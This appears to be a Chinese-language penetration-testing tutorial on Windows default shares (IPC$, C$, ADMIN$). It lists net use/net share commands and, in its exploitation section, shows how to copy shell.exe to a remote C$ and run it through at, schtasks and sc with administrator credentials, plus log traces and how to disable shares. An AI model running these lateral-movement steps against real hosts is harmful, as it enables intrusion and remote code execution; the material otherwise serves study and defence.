一、介绍在Windows 系统中，在“我的电脑”上右击“管理”，依次选择“系统工具→共享文件夹→共享”，就会看到一些带有美元“$”标记的符号就是Windows系统默认共享，也就是Windows在安装完毕后自动共享的功能

命令行下 net share

IPC$(Internet Process Connection)可以被理解为一种“专用管道”（命令管道，与服务server有关），可以在连接双方建立一条安全的通道，实现对远程计算机的访问。Windows NT/2000/XP提供了IPC$功能的同时，在初次安装系统时还打开了默认共享，即所有的逻辑共享(C$,D$,E$……)和系统目录(ADMIN$)共享。所有这些共享的目的，都是为了方便管理员的管理（只有管理员能够对他们进行远程操作），但在有意无意中，导致了系统安全性的隐患。

同时，微软这么说过:“服务器服务需要使用默认 IPC$ 系统管理共享。因此，您不可以删除此共享，我们建议您不要删除由 Windows 为根分区和卷创建的(如 C$)和为系统根文件夹创建的 (ADMIN$) 系统管理共享。删除这些文件夹可能会给依赖这些共享的管理员和程序或服务带来问题。” 只要服务器服务”Server”正在运行当中，就不可能删除IPC$。试图删除只会出现”拒绝访问”的错误提示。当你停止了Server服务后。IPC$会自动消失。

所有的共享都依赖于139或445端口

二、常用共享命令查看命令net use #查看本机建立的连接(本机连接其他机器)net session #查看本机建立的连接(其他机器连接的本机)，需要administrator用户执行

net share 命令net share 查看当前启用的共享

net share #查看本地开启的共享net share ipc$ #开启ipc$共享net share ipc$ /del #删除ipc$共享net share admin$ /del #删除admin$共享net share c$ /del #删除C盘共享net share d$ /del #删除D盘共享net share * /del #删除所有连接这样删除，重启电脑会自动打开

net use 连接操作net use \\192.168.10.15 #与192.168.10.15建立ipc空连接net use \\192.168.10.15\ipc$ #与192.168.10.15建立ipc空连接net use \\192.168.10.15\ipc$ /u:"" "" #与192.168.10.15建立ipc空连接net view \\192.168.10.15 #查看远程主机开启的默认共享net use \\192.168.10.15 /u:"administrator" "root" #以administrator身份与192.168.10.15建立ipc连接net use \\192.168.10.15 /del #删除建立的ipc连接使用域账号建立共享连接net use \\192.168.52.143\c$ 域账户密码 /user:域名\域账户net time \\192.168.10.15 #查看该主机上的时间net use \\192.168.10.15\c$ /u:"administrator" "root" #建立C盘共享dir \\192.168.10.15\c$ #查看192.168.10.15C盘文件dir \\192.168.10.15\c$\user #查看192.168.10.15C盘文件下的user目录dir \\192.168.10.15\c$\user\test.exe #查看192.168.10.15C盘文件下的user目录下的test.exe文件net use \\192.168.10.15\c$ /del #删除该C盘共享连接net use k: \\192.168.10.15\c$ /u:"administrator" "root" #将目标C盘映射到本地K盘net use k: /del #删除该映射

建立空连接：

源主机：

空连接没有什么用，访问被拒

目的主机：

三、IPC$的利用指非空连接

使用administrator建立IPC$连接，可以执行以下所有命令。使用普通用户建立IPC$连接，仅能执行查看时间命令：net time \192.168.10.131 ，其他命令均执行不了。管理员组 用户ciby连接

访问不了c盘共享

管理员账号连接1、可以列出c$ 目录和执行命令

2、文件管理也可以直接在文件管理用命令：\192.168.2.130\c$ 查看对应的文件及目录，也可以增删改查

3、tasklist命令（查看进程）

4、at命令(计划命令，可反弹shell)查看目标系统时间：net time \\192.168.2.130

将本目录下的指定文件复制到目标系统中：copy shell.exe \\192.168.2.130\c$

使用at创建计划任务：at \\192.168.2.130 14:14:00 C:\shell.exe

清除at记录：at \\192.168.2.130 作业ID /delete

使用at命令执行，将执行结果写入本地文本文件，再使用type命令查看该文件的内容：at \\192.168.2.130 14:23:00 cmd.exe /c "ipconfig > c:\1.txt"

查看生成的1.txt文件：type \\192.168.10.131\C$\1.txt

5、schtasks（计划任务）Windows Vista、Windows Server 2008及之后版本的操作系统已经弃用at命令，而转为用schtasks命令。schtasks命令比 at 命令更灵活。在使用schtasks命令时，会在系统中留下日志文件：C:\Windows\Tasks\SchedLgU.txt

在目标主机上创建一个名为test的计划任务，启动程序为C:\shell.exe，启动权限为system，启动时间为每隔一分钟启动一次

schtasks /create /s 192.168.2.130 /u administrator /p 123.com /tn test /sc MINUTE /mo 1 /tr c:\shell.exe /ru administrator /f

日志中表现：

schtasks /create /s 192.168.1.136 /u administrator /p password /tn c /tr c:\shell.exe /sc once /st 14:34

#/s 目标 /u 用户名 /p 密码 /tn 指定文件名 /tr 指定文件路径 /sc 执行次数 或频率 /st 开始时间

其他启动时间参数：

/sc onlogon 用户登录时启动

/sc onstart 系统启动时启动

/sc onidle 系统空闲时启动

查询该test计划任务

schtasks /s 192.168.2.130 /u administrator /p 123.com /query | findstr test

启动该test计划任务

schtasks /run /s 192.168.2.130 /u administrator /p 123.com /i /tn "test"

删除该test计划任务

schtasks /delete /s 192.168.2.130 /u administrator /p 123.com /tn "test" /f

6、sc命令创建服务copy test.exe \\192.168.10.20\c$

sc \\192.168.10.20 create test binpath= "c:\test.exe"

sc \\192.168.2.130 start test

查看创建的服务

sc \\192.168.2.130 delete test

7、Impacket中的atexec.pyImpacket中的atexec.py脚本，就是利用定时任务获取权限，该脚本的利用需要开启ipc$共享。这个脚本仅工作Windows>=Vista的系统上。这个样例能够通过任务计划服务（Task Scheduler）来在目标主机上实现命令执行，并返回命令执行后的输出结果 。

日志表现：

需要启用TaskScheduler日志

四、关闭共享的方法除了使用 net share * /del 这种方式删除之外，还有很多方式，比如修改注册表，关闭SERVER服务等，我们可以自行选择一种方式停止共享。

参考：

net share列出了Windows的默认共享（包括C盘）[通俗易懂] - 腾讯云开发者社区-腾讯云

Windows系统安全 | IPC$共享和其他共享(C$、D$、Admin$) - 腾讯云开发者社区-腾讯云

Schtasks（计划任务）命令详解_一个懒鬼的博客-CSDN博客

四种常用的meterpreter木马后门

Impacket使用 - ciyze0101 - 博客园

Impacket脚本利用指南（上） - 先知社区

关闭默认共享-关于Windows的默认共享介绍-腾讯云开发者社区-腾讯云